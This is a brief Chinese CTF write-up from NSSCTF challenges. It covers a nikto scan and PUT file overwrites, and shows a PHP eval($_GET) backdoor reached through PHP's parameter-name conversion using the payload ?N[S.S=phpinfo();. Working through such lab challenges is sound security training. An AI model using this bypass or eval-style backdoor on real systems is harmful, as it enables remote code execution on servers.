NSSCTF

[NSSRound#1 Basic]basic_check

nikto扫描 nikto -h url

PUT请求,如果不存在这个路径下的文件,将会创建,如果存在,会执行覆盖操作。

[NSSRound#8 Basic]MyDoor

php 复制代码
if (isset($_GET['N_S.S'])) {
    eval($_GET['N_S.S']);
}

php特性:在php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候,php会将怪异的变量名转换成有效的,在进行解析时会删除空白符,并将空格、+、点、[ 转换为下划线。

绕过:就是当 [ 提前出现后,[ 会转换成下划线,而后面的字符就不会再被转义了。

pyload:?N[S.S=phpinfo();

相关推荐
lzb_kkk4 小时前
【C++】C++四种类型转换操作符详解
开发语言·c++·windows·1024程序员节
独行soc6 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
Whoisshutiao8 小时前
网安-XSS-pikachu
前端·安全·网络安全
薄荷椰果抹茶17 小时前
【网络安全基础】第六章---Web安全需求
安全·web安全
游戏开发爱好者81 天前
iOS重构期调试实战:架构升级中的性能与数据保障策略
websocket·网络协议·tcp/ip·http·网络安全·https·udp
HumanRisk1 天前
降低网络安全中的人为风险:以人为本的路径
网络·安全·web安全
安全系统学习1 天前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
江苏思维驱动智能研究院有限公司1 天前
Sophos 网络安全:全球领先的自适应安全解决方案提供商
网络·安全·web安全
A5rZ1 天前
Puppeteer 相关漏洞-- Google 2025 Sourceless
网络安全
Bruce_Liuxiaowei1 天前
常见高危端口风险分析与防护指南
网络·网络安全·端口·信息搜集